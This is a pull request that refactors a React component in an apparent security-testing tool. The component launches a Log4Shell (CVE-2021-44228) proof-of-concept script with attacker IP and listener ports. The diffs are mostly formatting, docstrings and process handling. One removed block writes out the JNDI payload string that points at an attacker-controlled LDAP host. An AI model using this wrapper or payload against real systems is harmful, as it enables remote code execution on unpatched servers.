### PR TITLE
621 bug fix baseline CVE 2021 44228

### DIFF
--- a/src/components/CVE-2021-44228/CVE-2021-44228.tsx
+++ b/src/components/CVE-2021-44228/CVE-2021-44228.tsx
@@ -161,11 +161,15 @@ const dependencies = ["python3"]; // Contains the dependencies required by the c
 
    
 
-    const clearOutput = useCallback(() => {
-        setOutput("");
-        setHasSaved(false);
-        setAllowSave(false);
-    }, [setOutput]);
+   /**
+     * clearOutput: Callback function to clear the console output.
+     * It resets the state variable holding the output, thereby clearing the display.
+     */
+   const clearOutput = useCallback(() => {
+    setOutput("");
+    setHasSaved(false);
+    setAllowSave(false);
+}, [setOutput]);
 
     const handleSaveComplete = () => {
         // Indicating that the file has saved which is passed

--- a/src/components/CVE-2021-44228/CVE-2021-44228.tsx
+++ b/src/components/CVE-2021-44228/CVE-2021-44228.tsx
@@ -16,7 +16,8 @@ interface FormValues {
 }
 // Component Constants.
 const title = "CVE-2021-44228"; // Title for the CVE 2021-44228 exploit.
-const description_userguide = "This attack vector exploits vulnerabilities within Apache's Log4j2 where an attacker that is in control of log " +
+const description_userguide =
+    "This attack vector exploits vulnerabilities within Apache's Log4j2 where an attacker that is in control of log " +
     "message/log message parameters is able to execute remote arbitrary code that is to be loaded in from LDAP servers " +
     "upon message lookup substitution being active.\n\nFurther information can be found at: https://nvd.nist.gov/vuln/" +
     "detail/cve-2021-44228\n"; // Description providing information about the CVE 2021-41773 exploit.
@@ -33,12 +34,10 @@ const sourceLink = "cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228"; // L
 const tutorial = ""; // Link to the official documentation/tutorial.
 const dependencies = ["python3"]; // Contains the dependencies required by the component.
 
-
-
 /**
-    * @returns The LOG4j Exploit component.
-    */
-    const CVE202144228 = () => {
+ * @returns The LOG4j Exploit component.
+ */
+const CVE202144228 = () => {
     const [loading, setLoading] = useState(false); // State variable to indicate loading state.
     const [allowSave, setAllowSave] = useState(false); // State variable boolean to indicate save state.
     const [hasSaved, setHasSaved] = useState(false); // State variable boolean to indicate if the save has been saved.
@@ -111,65 +110,63 @@ const dependencies = ["python3"]; // Contains the dependencies required by the c
             setAllowSave(true);
             setHasSaved(false);
         },
-        [handleProcessData] // Dependency on the handleProcessData callback
+        [handleProcessData], // Dependency on the handleProcessData callback
     );
 
-        /**
+    /**
      * Function to handle form submission.
      * Executes the Log4J exploit with the provided form values.
      * @param {FormValues} values - Form values containing attacker IP, web port, and local port.
      */
-        const onSubmit = async (values: FormValues) => {
-            // Activate loading state to indicate ongoing process.
-            setLoading(true);
-             // Disallow saving until the tool's execution is complete
-            setAllowSave(false);
-            // Construct arguments for the Log4J exploit command based on form input.
-            const args = [
-                "/usr/share/ddt/log4j-shell-poc/poc.py",
-                "--userip",
-                values.attackerip,
-                "--webport",
-                `${values.webport}`,
-                "--lport",
-                `${values.localport}`,
-            ];
-            
-         try {
-                //Execute the LOG4j command via helper method and handle its output or potential errors.
-                const result = await CommandHelper.runCommandGetPidAndOutput(
-                    "python3",
-                    args,
-                    handleProcessData,
-                    handleProcessTermination
-                );
-                 //Update command with the result.
-                setOutput(result.output);
-                console.log(pid);
-                setPid(result.pid);
-    
-                //Display output error messages.
-            } catch (error) {
-                console.error('An error occurred while executing the command:', error);
-            } finally {
-                // Deactivate loading state
-                setLoading(false);
-                // Activate AllowSave to generate output results.
-                setAllowSave(true);
-            }
-        };
+    const onSubmit = async (values: FormValues) => {
+        // Activate loading state to indicate ongoing process.
+        setLoading(true);
+        // Disallow saving until the tool's execution is complete
+        setAllowSave(false);
+        // Construct arguments for the Log4J exploit command based on form input.
+        const args = [
+            "/usr/share/ddt/log4j-shell-poc/poc.py",
+            "--userip",
+            values.attackerip,
+            "--webport",
+            `${values.webport}`,
+            "--lport",
+            `${values.localport}`,
+        ];
 
-   
+        try {
+            //Execute the LOG4j command via helper method and handle its output or potential errors.
+            const result = await CommandHelper.runCommandGetPidAndOutput(
+                "python3",
+                args,
+                handleProcessData,
+                handleProcessTermination,
+            );
+            //Update command with the result.
+            setOutput(result.output);
+            console.log(pid);
+            setPid(result.pid);
 
-   /**
+            //Display output error messages.
+        } catch (error) {
+            console.error("An error occurred while executing the command:", error);
+        } finally {
+            // Deactivate loading state
+            setLoading(false);
+            // Activate AllowSave to generate output results.
+            setAllowSave(true);
+        }
+    };
+
+    /**
      * clearOutput: Callback function to clear the console output.
      * It resets the state variable holding the output, thereby clearing the display.
      */
-   const clearOutput = useCallback(() => {
-    setOutput("");
-    setHasSaved(false);
-    setAllowSave(false);
-}, [setOutput]);
+    const clearOutput = useCallback(() => {
+        setOutput("");
+        setHasSaved(false);
+        setAllowSave(false);
+    }, [setOutput]);
 
     const handleSaveComplete = () => {
         // Indicating that the file has saved which is passed
@@ -195,7 +192,7 @@ const dependencies = ["python3"]; // Contains the dependencies required by the c
                 ></InstallationModal>
             )}
 
-             <form onSubmit={form.onSubmit(onSubmit)}>
+            <form onSubmit={form.onSubmit(onSubmit)}>
                 <Stack>
                     {LoadingOverlayAndCancelButton(loading, pid)}
                     <TextInput label={"Attacker IP Address"} required {...form.getInputProps("attackerip")} />
@@ -208,6 +205,6 @@ const dependencies = ["python3"]; // Contains the dependencies required by the c
             </form>
         </RenderComponent>
     );
-}
+};
 
 export default CVE202144228;

--- a/src/components/CVE-2021-44228/CVE-2021-44228.tsx
+++ b/src/components/CVE-2021-44228/CVE-2021-44228.tsx
@@ -114,42 +114,55 @@ const dependencies = ["python3"]; // Contains the dependencies required by the c
         [handleProcessData] // Dependency on the handleProcessData callback
     );
 
-    const onSubmit = async (values: FormValues) => {
-        setLoading(true);
-
-        // Disallow saving until the tool's execution is complete
-        setAllowSave(false);
-
-        const args = [
-            "/usr/share/ddt/log4j-shell-poc/poc.py",
-            "--userip",
-            values.attackerip,
-            "--webport",
-            `${values.webport}`,
-            "--lport",
-            `${values.localport}`,
-        ];
-        const command = new Command("python3", args);
-        const newHandle = await command.spawn();
-
-        const payloadLocation = `\${jndi:ldap://${values.attackerip}:1389/a}`;
-        const webserverLocation = "Starting webserver on port 8000 http://0.0.0.0:8000";
-
-        setPayloadLocation(payloadLocation);
-        setWebserverLocation(webserverLocation);
-
-        const output = await CommandHelper.runCommand("python3", args);
-
-        setHandle(newHandle);
-        setOutput(output);
-        setLoading(false);
-        setAllowSave(true);
-    };
+        /**
+     * Function to handle form submission.
+     * Executes the Log4J exploit with the provided form values.
+     * @param {FormValues} values - Form values containing attacker IP, web port, and local port.
+     */
+        const onSubmit = async (values: FormValues) => {
+            // Activate loading state to indicate ongoing process.
+            setLoading(true);
+             // Disallow saving until the tool's execution is complete
+            setAllowSave(false);
+            // Construct arguments for the Log4J exploit command based on form input.
+            const args = [
+                "/usr/share/ddt/log4j-shell-poc/poc.py",
+                "--userip",
+                values.attackerip,
+                "--webport",
+                `${values.webport}`,
+                "--lport",
+                `${values.localport}`,
+            ];
+            
+         try {
+                //Execute the LOG4j command via helper method and handle its output or potential errors.
+                const result = await CommandHelper.runCommandGetPidAndOutput(
+                    "python3",
+                    args,
+                    handleProcessData,
+                    handleProcessTermination
+                );
+                 //Update command with the result.
+                setOutput(result.output);
+                console.log(pid);
+                setPid(result.pid);
+    
+                //Display output error messages.
+            } catch (error) {
+                console.error('An error occurred while executing the command:', error);
+            } finally {
+                // Deactivate loading state
+                setLoading(false);
+                // Activate AllowSave to generate output results.
+                setAllowSave(true);
+            }
+        };
 
     const killHandle = async () => {
         if (handle) {
             await handle.kill();
-            setHandle(null);
+            setHandle(neverull);
             setPayloadLocation(null);
             setWebserverLocation(null);
         }

--- a/src/components/CVE-2021-44228/CVE-2021-44228.tsx
+++ b/src/components/CVE-2021-44228/CVE-2021-44228.tsx
@@ -50,7 +50,7 @@ const CVE202144228 = () => {
     const [loadingModal, setLoadingModal] = useState(true); // State variable to indicate loading state of the modal.
     const [output, setOutput] = useState(""); // State variable to store the output of the command execution.
 
-// Form Hook to handle form input.
+    // Form Hook to handle form input.
     let form = useForm({
         initialValues: {
             attackerip: "127.0.0.1",
@@ -114,7 +114,7 @@ const CVE202144228 = () => {
             setAllowSave(true);
             setHasSaved(false);
         },
-        [handleProcessData], // Dependency on the handleProcessData callback
+        [handleProcessData] // Dependency on the handleProcessData callback
     );
 
     /**
@@ -144,7 +144,7 @@ const CVE202144228 = () => {
                 "python3",
                 args,
                 handleProcessData,
-                handleProcessTermination,
+                handleProcessTermination
             );
             //Update command with the result.
             setOutput(result.output);
@@ -171,7 +171,7 @@ const CVE202144228 = () => {
         setHasSaved(false);
         setAllowSave(false);
     }, [setOutput]);
- 
+
     /**
      * handleSaveComplete: Callback to handle the completion of the file saving process.
      * It updates the state by indicating that the file has been saved and deactivates the save button.

--- a/src/components/CVE-2021-44228/CVE-2021-44228.tsx
+++ b/src/components/CVE-2021-44228/CVE-2021-44228.tsx
@@ -9,6 +9,11 @@ import { LoadingOverlayAndCancelButton } from "../OverlayAndCancelButton/Overlay
 import { checkAllCommandsAvailability } from "../../utils/CommandAvailability";
 import InstallationModal from "../InstallationModal/InstallationModal";
 
+interface FormValues {
+    attackerip: string;
+    webport: number;
+    localport: number;
+}
 
 const title = "Log4J Exploit";
 const description_userguide =
@@ -26,11 +31,6 @@ const description_userguide =
     "Step 4: Click Exploit to commence the exploits operation.\n\n" +
     "Step 5: View the Output block below to view the results of the attack vectors execution.";
 
-interface FormValues {
-    attackerip: string;
-    webport: number;
-    localport: number;
-}
 
 const CVE202144228 = () => {
     const [loading, setLoading] = useState(false);

--- a/src/components/CVE-2021-44228/CVE-2021-44228.tsx
+++ b/src/components/CVE-2021-44228/CVE-2021-44228.tsx
@@ -231,9 +231,7 @@ const CVE202144228 = () => {
                     <NumberInput label={"Web Port"} required {...form.getInputProps("webPort")} />
                     <NumberInput label={"Local Port"} required {...form.getInputProps("localPort")} />
                     <Button type={"submit"}>Exploit</Button>
-                    <Button type={"button"} onClick={killProcess} disabled={!pid}>
-                        Kill Process
-                    </Button>
+                    <Button type={"button"} onClick={killProcess} disabled={!pid}>Kill Process</Button>
                     {SaveOutputToTextFile_v2(output, allowSave, hasSaved, handleSaveComplete)}
                     <ConsoleWrapper output={output} clearOutputCallback={clearOutput} />
                 </Stack>

--- a/src/components/CVE-2021-44228/CVE-2021-44228.tsx
+++ b/src/components/CVE-2021-44228/CVE-2021-44228.tsx
@@ -14,22 +14,25 @@ interface FormValues {
     webport: number;
     localport: number;
 }
-
-const title = "Log4J Exploit";
-const description_userguide =
-    "This attack vector exploits vulnerabilities within Apache’s Log4j2 where an attacker that is in control of log " +
+// Component Constants.
+const title = "CVE-2021-44228"; // Title for the CVE 2021-44228 exploit.
+const description_userguide = "This attack vector exploits vulnerabilities within Apache's Log4j2 where an attacker that is in control of log " +
     "message/log message parameters is able to execute remote arbitrary code that is to be loaded in from LDAP servers " +
     "upon message lookup substitution being active.\n\nFurther information can be found at: https://nvd.nist.gov/vuln/" +
-    "detail/cve-2021-44228\n\n" +
-    "Using Log4J Exploit:\n" +
+    "detail/cve-2021-44228\n"; // Description providing information about the CVE 2021-41773 exploit.
+const steps =
     "Step 1: Enter an Attacker IP address.\n" +
-    "       Eg: 127.0.0.1\n\n" +
+    "       Eg: 127.0.0.1\n" +
     "Step 2: Enter a Web Port.\n" +
-    "       Eg: 8000\n\n" +
+    "       Eg: 8000\n" +
     "Step 3: Enter a Local Port.\n" +
-    "       Eg: 9001\n\n" +
-    "Step 4: Click Exploit to commence the exploits operation.\n\n" +
+    "       Eg: 9001\n" +
+    "Step 4: Click Exploit to commence the exploits operation.\n" +
     "Step 5: View the Output block below to view the results of the attack vectors execution.";
+const sourceLink = "cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228"; // Link to the source code (or Kali Tools).
+const tutorial = ""; // Link to the official documentation/tutorial.
+const dependencies = ["python3"]; // Contains the dependencies required by the component.
+
 
 
 const CVE202144228 = () => {

--- a/src/components/CVE-2021-44228/CVE-2021-44228.tsx
+++ b/src/components/CVE-2021-44228/CVE-2021-44228.tsx
@@ -9,6 +9,9 @@ import { LoadingOverlayAndCancelButton } from "../OverlayAndCancelButton/Overlay
 import { checkAllCommandsAvailability } from "../../utils/CommandAvailability";
 import InstallationModal from "../InstallationModal/InstallationModal";
 
+/**
+ * Represents the form values for the LOG4j component.
+ */
 interface FormValues {
     attackerip: string;
     webport: number;
@@ -20,7 +23,7 @@ const description_userguide =
     "This attack vector exploits vulnerabilities within Apache's Log4j2 where an attacker that is in control of log " +
     "message/log message parameters is able to execute remote arbitrary code that is to be loaded in from LDAP servers " +
     "upon message lookup substitution being active.\n\nFurther information can be found at: https://nvd.nist.gov/vuln/" +
-    "detail/cve-2021-44228\n"; // Description providing information about the CVE 2021-41773 exploit.
+    "detail/cve-2021-44228\n"; // Description providing information about the CVE 2021-2021-4428 exploit.
 const steps =
     "Step 1: Enter an Attacker IP address.\n" +
     "       Eg: 127.0.0.1\n" +
@@ -47,6 +50,7 @@ const CVE202144228 = () => {
     const [loadingModal, setLoadingModal] = useState(true); // State variable to indicate loading state of the modal.
     const [output, setOutput] = useState(""); // State variable to store the output of the command execution.
 
+// Form Hook to handle form input.
     let form = useForm({
         initialValues: {
             attackerip: "127.0.0.1",
@@ -167,7 +171,11 @@ const CVE202144228 = () => {
         setHasSaved(false);
         setAllowSave(false);
     }, [setOutput]);
-
+ 
+    /**
+     * handleSaveComplete: Callback to handle the completion of the file saving process.
+     * It updates the state by indicating that the file has been saved and deactivates the save button.
+     */
     const handleSaveComplete = () => {
         // Indicating that the file has saved which is passed
         // back into SaveOutputToTextFile to inform the user

--- a/src/components/CVE-2021-44228/CVE-2021-44228.tsx
+++ b/src/components/CVE-2021-44228/CVE-2021-44228.tsx
@@ -23,7 +23,7 @@ const description_userguide =
     "This attack vector exploits vulnerabilities within Apache's Log4j2 where an attacker that is in control of log " +
     "message/log message parameters is able to execute remote arbitrary code that is to be loaded in from LDAP servers " +
     "upon message lookup substitution being active.\n\nFurther information can be found at: https://nvd.nist.gov/vuln/" +
-    "detail/cve-2021-44228\n"; // Description providing information about the CVE 2021-2021-4428 exploit.
+    "detail/cve-2021-44228\n"; // Description providing information about the CVE 2021-4428 exploit.
 const steps =
     "Step 1: Enter an Attacker IP address.\n" +
     "       Eg: 127.0.0.1\n" +

--- a/src/components/CVE-2021-44228/CVE-2021-44228.tsx
+++ b/src/components/CVE-2021-44228/CVE-2021-44228.tsx
@@ -1,12 +1,14 @@
-import { Button, LoadingOverlay, NumberInput, Stack, TextInput } from "@mantine/core";
+import { Button, Stack, TextInput, NumberInput } from "@mantine/core";
 import { useForm } from "@mantine/form";
-import { IconDoorExit } from "@tabler/icons";
-import { Child, Command } from "@tauri-apps/api/shell";
-import { useCallback, useState } from "react";
+import { useCallback, useState, useEffect } from "react";
 import { CommandHelper } from "../../utils/CommandHelper";
 import ConsoleWrapper from "../ConsoleWrapper/ConsoleWrapper";
-import { UserGuide } from "../UserGuide/UserGuide";
-import { SaveOutputToTextFile_v2 } from "../SaveOutputToFile/SaveOutputToTextFile"; //v2
+import { RenderComponent } from "../UserGuide/UserGuide";
+import { SaveOutputToTextFile_v2 } from "../SaveOutputToFile/SaveOutputToTextFile";
+import { LoadingOverlayAndCancelButton } from "../OverlayAndCancelButton/OverlayAndCancelButton";
+import { checkAllCommandsAvailability } from "../../utils/CommandAvailability";
+import InstallationModal from "../InstallationModal/InstallationModal";
+
 
 const title = "Log4J Exploit";
 const description_userguide =

--- a/src/components/CVE-2021-44228/CVE-2021-44228.tsx
+++ b/src/components/CVE-2021-44228/CVE-2021-44228.tsx
@@ -159,14 +159,7 @@ const dependencies = ["python3"]; // Contains the dependencies required by the c
             }
         };
 
-    const killHandle = async () => {
-        if (handle) {
-            await handle.kill();
-            setHandle(neverull);
-            setPayloadLocation(null);
-            setWebserverLocation(null);
-        }
-    };
+   
 
     const clearOutput = useCallback(() => {
         setOutput("");

--- a/src/components/CVE-2021-44228/CVE-2021-44228.tsx
+++ b/src/components/CVE-2021-44228/CVE-2021-44228.tsx
@@ -13,7 +13,7 @@ import InstallationModal from "../InstallationModal/InstallationModal";
 The CVE202144228 component
  * @returns The CVE202144228 component.
  */
-interface FormValues {
+interface FormValuesType {
     attackerIP: string;
     webPort: number;
     localPort: number;
@@ -123,7 +123,7 @@ const CVE202144228 = () => {
      * Executes the Log4J exploit with the provided form values.
      * @param {FormValues} values - Form values containing attacker IP, web port, and local port.
      */
-    const onSubmit = async (values: FormValues) => {
+    const onSubmit = async (values: FormValuesType) => {
         // Activate loading state to indicate ongoing process.
         setLoading(true);
         // Disallow saving until the tool's execution is complete

--- a/src/components/CVE-2021-44228/CVE-2021-44228.tsx
+++ b/src/components/CVE-2021-44228/CVE-2021-44228.tsx
@@ -56,6 +56,25 @@ const dependencies = ["python3"]; // Contains the dependencies required by the c
         },
     });
 
+    useEffect(() => {
+        // Check if the command is available and set the state variables accordingly.
+        checkAllCommandsAvailability(dependencies)
+            .then((isAvailable) => {
+                // Set the command availability state.
+                setIsCommandAvailable(isAvailable);
+                // Set the modal state to opened if the command is not available.
+                setOpened(!isAvailable);
+                // Set loading to false after the check is done.
+                setLoadingModal(false); // Ensure this is set to false even if successful
+            })
+            .catch((error) => {
+                console.error("An error occurred:", error);
+                // Also set loading to false in case of error.
+                setLoadingModal(false); // Crucial change, set to false even on errors
+            });
+    }, []);
+
+    
     const onSubmit = async (values: FormValues) => {
         setLoading(true);
 

--- a/src/components/CVE-2021-44228/CVE-2021-44228.tsx
+++ b/src/components/CVE-2021-44228/CVE-2021-44228.tsx
@@ -194,25 +194,20 @@ const dependencies = ["python3"]; // Contains the dependencies required by the c
                     dependencies={dependencies}
                 ></InstallationModal>
             )}
-            
-        <form onSubmit={form.onSubmit((values) => onSubmit(values))}>
-            <LoadingOverlay visible={loading} />
-            <Stack>
-                {UserGuide(title, description_userguide)}
-                <TextInput label={"Attacker IP Address"} required {...form.getInputProps("attackerip")} />
-                <NumberInput label={"Web Port"} required {...form.getInputProps("webport")} />
-                <NumberInput label={"Local Port"} required {...form.getInputProps("localport")} />
-                <Button type={"submit"}>Exploit</Button>
-                {SaveOutputToTextFile_v2(output, allowSave, hasSaved, handleSaveComplete)}
-                <ConsoleWrapper output={output} clearOutputCallback={clearOutput} />
-                {handle && (
-                    <Button leftIcon={<IconDoorExit />} onClick={killHandle} color={"red"}>
-                        Kill process
-                    </Button>
-                )}
-            </Stack>
-        </form>
+
+             <form onSubmit={form.onSubmit(onSubmit)}>
+                <Stack>
+                    {LoadingOverlayAndCancelButton(loading, pid)}
+                    <TextInput label={"Attacker IP Address"} required {...form.getInputProps("attackerip")} />
+                    <NumberInput label={"Web Port"} required {...form.getInputProps("webport")} />
+                    <NumberInput label={"Local Port"} required {...form.getInputProps("localport")} />
+                    <Button type={"submit"}>Exploit</Button>
+                    {SaveOutputToTextFile_v2(output, allowSave, hasSaved, handleSaveComplete)}
+                    <ConsoleWrapper output={output} clearOutputCallback={clearOutput} />
+                </Stack>
+            </form>
+        </RenderComponent>
     );
-};
+}
 
 export default CVE202144228;

--- a/src/components/CVE-2021-44228/CVE-2021-44228.tsx
+++ b/src/components/CVE-2021-44228/CVE-2021-44228.tsx
@@ -179,6 +179,13 @@ const dependencies = ["python3"]; // Contains the dependencies required by the c
     };
 
     return (
+        <RenderComponent
+            title={title}
+            description={description_userguide}
+            steps={steps}
+            tutorial={tutorial}
+            sourceLink={sourceLink}
+        >
         <form onSubmit={form.onSubmit((values) => onSubmit(values))}>
             <LoadingOverlay visible={loading} />
             <Stack>

--- a/src/components/CVE-2021-44228/CVE-2021-44228.tsx
+++ b/src/components/CVE-2021-44228/CVE-2021-44228.tsx
@@ -231,7 +231,9 @@ const CVE202144228 = () => {
                     <NumberInput label={"Web Port"} required {...form.getInputProps("webPort")} />
                     <NumberInput label={"Local Port"} required {...form.getInputProps("localPort")} />
                     <Button type={"submit"}>Exploit</Button>
-                    <Button type={"button"} onClick={killProcess} disabled={!pid}>Kill Process</Button>
+                    <Button type={"button"} onClick={killProcess} disabled={!pid}>
+                        Kill Process
+                    </Button>
                     {SaveOutputToTextFile_v2(output, allowSave, hasSaved, handleSaveComplete)}
                     <ConsoleWrapper output={output} clearOutputCallback={clearOutput} />
                 </Stack>

--- a/src/components/CVE-2021-44228/CVE-2021-44228.tsx
+++ b/src/components/CVE-2021-44228/CVE-2021-44228.tsx
@@ -10,7 +10,8 @@ import { checkAllCommandsAvailability } from "../../utils/CommandAvailability";
 import InstallationModal from "../InstallationModal/InstallationModal";
 
 /**
- * Represents the form values for the LOG4j component.
+The CVE202144228 component
+ * @returns The CVE202144228 component.
  */
 interface FormValues {
     attackerIP: string;

--- a/src/components/CVE-2021-44228/CVE-2021-44228.tsx
+++ b/src/components/CVE-2021-44228/CVE-2021-44228.tsx
@@ -183,6 +183,29 @@ const CVE202144228 = () => {
         setAllowSave(false);
     };
 
+    /**
+     * killProcess, kills the proccess and handles it output to display error messages or completion message
+     */
+    const killProcess = async () => {
+        if (!pid) {
+            alert("Nothing to kill.");
+            return;
+        }
+
+        try {
+            //Execute the killProcess command using the pid
+            await CommandHelper.runCommand("kill", [pid]);
+            //Set output and display message with pid if killed
+            setOutput((prevOutput) => prevOutput + `\nProcess ${pid} is killed and is dead.`);
+            //Set Pid after killing process
+            setPid("");
+            //Catch errors
+        } catch (error) {
+            //Set output and catch errors and display pid and display error message
+            setOutput((prevOutput) => prevOutput + `\nFailed to kill process with ${pid}: ${error.message}`);
+        }
+    };
+
     return (
         <RenderComponent
             title={title}
@@ -207,6 +230,9 @@ const CVE202144228 = () => {
                     <NumberInput label={"Web Port"} required {...form.getInputProps("webPort")} />
                     <NumberInput label={"Local Port"} required {...form.getInputProps("localPort")} />
                     <Button type={"submit"}>Exploit</Button>
+                    <Button type={"button"} onClick={killProcess} disabled={!pid}>
+                        Kill Process
+                    </Button>
                     {SaveOutputToTextFile_v2(output, allowSave, hasSaved, handleSaveComplete)}
                     <ConsoleWrapper output={output} clearOutputCallback={clearOutput} />
                 </Stack>

--- a/src/components/CVE-2021-44228/CVE-2021-44228.tsx
+++ b/src/components/CVE-2021-44228/CVE-2021-44228.tsx
@@ -202,7 +202,7 @@ const CVE202144228 = () => {
             //Catch errors
         } catch (error) {
             //Set output and catch errors and display pid and display error message
-            setOutput((prevOutput) => prevOutput + `\nFailed to kill process with ${pid}: ${error.message}`);
+            setOutput((prevOutput) => prevOutput + `\nFailed to kill process with ${pid}: ${(error as Error).message}`);
         }
     };
 

--- a/src/components/CVE-2021-44228/CVE-2021-44228.tsx
+++ b/src/components/CVE-2021-44228/CVE-2021-44228.tsx
@@ -186,6 +186,15 @@ const dependencies = ["python3"]; // Contains the dependencies required by the c
             tutorial={tutorial}
             sourceLink={sourceLink}
         >
+            {!loadingModal && (
+                <InstallationModal
+                    isOpen={opened}
+                    setOpened={setOpened}
+                    feature_description={description_userguide}
+                    dependencies={dependencies}
+                ></InstallationModal>
+            )}
+            
         <form onSubmit={form.onSubmit((values) => onSubmit(values))}>
             <LoadingOverlay visible={loading} />
             <Stack>

--- a/src/components/CVE-2021-44228/CVE-2021-44228.tsx
+++ b/src/components/CVE-2021-44228/CVE-2021-44228.tsx
@@ -13,13 +13,13 @@ import InstallationModal from "../InstallationModal/InstallationModal";
  * Represents the form values for the LOG4j component.
  */
 interface FormValues {
-    attackerip: string;
-    webport: number;
-    localport: number;
+    attackerIP: string;
+    webPort: number;
+    localPort: number;
 }
 // Component Constants.
 const title = "CVE-2021-44228"; // Title for the CVE 2021-44228 exploit.
-const description_userguide =
+const description =
     "This attack vector exploits vulnerabilities within Apache's Log4j2 where an attacker that is in control of log " +
     "message/log message parameters is able to execute remote arbitrary code that is to be loaded in from LDAP servers " +
     "upon message lookup substitution being active.\n\nFurther information can be found at: https://nvd.nist.gov/vuln/" +
@@ -53,9 +53,9 @@ const CVE202144228 = () => {
     // Form Hook to handle form input.
     let form = useForm({
         initialValues: {
-            attackerip: "127.0.0.1",
-            webport: 8000,
-            localport: 9001,
+            attackerIP: "127.0.0.1",
+            webPort: 8000,
+            localPort: 9001,
         },
     });
 
@@ -131,11 +131,11 @@ const CVE202144228 = () => {
         const args = [
             "/usr/share/ddt/log4j-shell-poc/poc.py",
             "--userip",
-            values.attackerip,
+            values.attackerIP,
             "--webport",
-            `${values.webport}`,
+            `${values.webPort}`,
             "--lport",
-            `${values.localport}`,
+            `${values.localPort}`,
         ];
 
         try {
@@ -186,7 +186,7 @@ const CVE202144228 = () => {
     return (
         <RenderComponent
             title={title}
-            description={description_userguide}
+            description={description}
             steps={steps}
             tutorial={tutorial}
             sourceLink={sourceLink}
@@ -195,7 +195,7 @@ const CVE202144228 = () => {
                 <InstallationModal
                     isOpen={opened}
                     setOpened={setOpened}
-                    feature_description={description_userguide}
+                    feature_description={description}
                     dependencies={dependencies}
                 ></InstallationModal>
             )}
@@ -203,9 +203,9 @@ const CVE202144228 = () => {
             <form onSubmit={form.onSubmit(onSubmit)}>
                 <Stack>
                     {LoadingOverlayAndCancelButton(loading, pid)}
-                    <TextInput label={"Attacker IP Address"} required {...form.getInputProps("attackerip")} />
-                    <NumberInput label={"Web Port"} required {...form.getInputProps("webport")} />
-                    <NumberInput label={"Local Port"} required {...form.getInputProps("localport")} />
+                    <TextInput label={"Attacker IP Address"} required {...form.getInputProps("attackerIP")} />
+                    <NumberInput label={"Web Port"} required {...form.getInputProps("webPort")} />
+                    <NumberInput label={"Local Port"} required {...form.getInputProps("localPort")} />
                     <Button type={"submit"}>Exploit</Button>
                     {SaveOutputToTextFile_v2(output, allowSave, hasSaved, handleSaveComplete)}
                     <ConsoleWrapper output={output} clearOutputCallback={clearOutput} />

--- a/src/components/CVE-2021-44228/CVE-2021-44228.tsx
+++ b/src/components/CVE-2021-44228/CVE-2021-44228.tsx
@@ -35,14 +35,18 @@ const dependencies = ["python3"]; // Contains the dependencies required by the c
 
 
 
-const CVE202144228 = () => {
-    const [loading, setLoading] = useState(false);
-    const [handle, setHandle] = useState<Child | null>(null);
-    const [output, setOutput] = useState("");
-    const [payloadLocation, setPayloadLocation] = useState<string | null>(null);
-    const [webserverLocation, setWebserverLocation] = useState<string | null>(null);
-    const [allowSave, setAllowSave] = useState(false);
-    const [hasSaved, setHasSaved] = useState(false);
+/**
+    * @returns The LOG4j Exploit component.
+    */
+    const CVE202144228 = () => {
+    const [loading, setLoading] = useState(false); // State variable to indicate loading state.
+    const [allowSave, setAllowSave] = useState(false); // State variable boolean to indicate save state.
+    const [hasSaved, setHasSaved] = useState(false); // State variable boolean to indicate if the save has been saved.
+    const [pid, setPid] = useState(""); // State variable to store the process ID of the command execution.
+    const [isCommandAvailable, setIsCommandAvailable] = useState(false); // State variable to check if the command is available.
+    const [opened, setOpened] = useState(!isCommandAvailable); // State variable that indicates if the modal is opened.
+    const [loadingModal, setLoadingModal] = useState(true); // State variable to indicate loading state of the modal.
+    const [output, setOutput] = useState(""); // State variable to store the output of the command execution.
 
     let form = useForm({
         initialValues: {

--- a/src/components/CVE-2021-44228/CVE-2021-44228.tsx
+++ b/src/components/CVE-2021-44228/CVE-2021-44228.tsx
@@ -74,7 +74,46 @@ const dependencies = ["python3"]; // Contains the dependencies required by the c
             });
     }, []);
 
-    
+    /**
+     * handleProcessData: Callback to handle and append new data from the child process to the output.
+     * It updates the state by appending the new data received to the existing output.
+     * @param {string} data - The data received from the child process.
+     */
+    const handleProcessData = useCallback((data: string) => {
+        setOutput((prevOutput) => prevOutput + "\n" + data); // Append new data to the previous output.
+    }, []);
+
+    /**
+     * handleProcessTermination: Callback to handle the termination of the child process.
+     * Once the process termination is handled, it clears the process PID reference and
+     * deactivates the loading overlay.
+     * @param {object} param - An object containing information about the process termination.
+     * @param {number} param.code - The exit code of the terminated process.
+     * @param {number} param.signal - The signal code indicating how the process was terminated.
+     */
+    const handleProcessTermination = useCallback(
+        ({ code, signal }: { code: number; signal: number }) => {
+            // If the process was successful, display a success message.
+            if (code === 0) {
+                handleProcessData("\nProcess completed successfully.");
+                // If the process was terminated manually, display a termination message.
+            } else if (signal === 15) {
+                handleProcessData("\nProcess was manually terminated.");
+                // If the process was terminated with an error, display the exit and signal codes.
+            } else {
+                handleProcessData(`\nProcess terminated with exit code: ${code} and signal code: ${signal}`);
+            }
+            // Clear the child process pid reference. There is no longer a valid process running.
+            setPid("");
+            // Cancel the loading overlay. The process has completed.
+            setLoading(false);
+            // Allow Saving as the output is finalised
+            setAllowSave(true);
+            setHasSaved(false);
+        },
+        [handleProcessData] // Dependency on the handleProcessData callback
+    );
+
     const onSubmit = async (values: FormValues) => {
         setLoading(true);
 


### PR DESCRIPTION
*Added new imports and removed unused or depreciated ones
*Updated FormValue with correct values
*Removed old user guide and added new one with title, description, steps, source link, tutorial and dependencies
*Removed old LOG4j components state variables and added updated component variables
*Added useEffect function
*Added handleProcess and handleProcessTermination
*Removed killHandle function (Typo for second commit)
*Added clearOutput Docstrings
*Added RenderComponent to return statement
*Added InstallationModal to return statement
*Added LoadingOverlayAndCancelButton
*Ran npx prettier
*Cleaned up DocStrings

Exploit needs a certain version of Java runtime to execute, Oracle has removed it because it is vulnerable from download lists. 

Could not find any good or working honeypots to test the new baseline version, if you know please let me know so I can test myself.

 

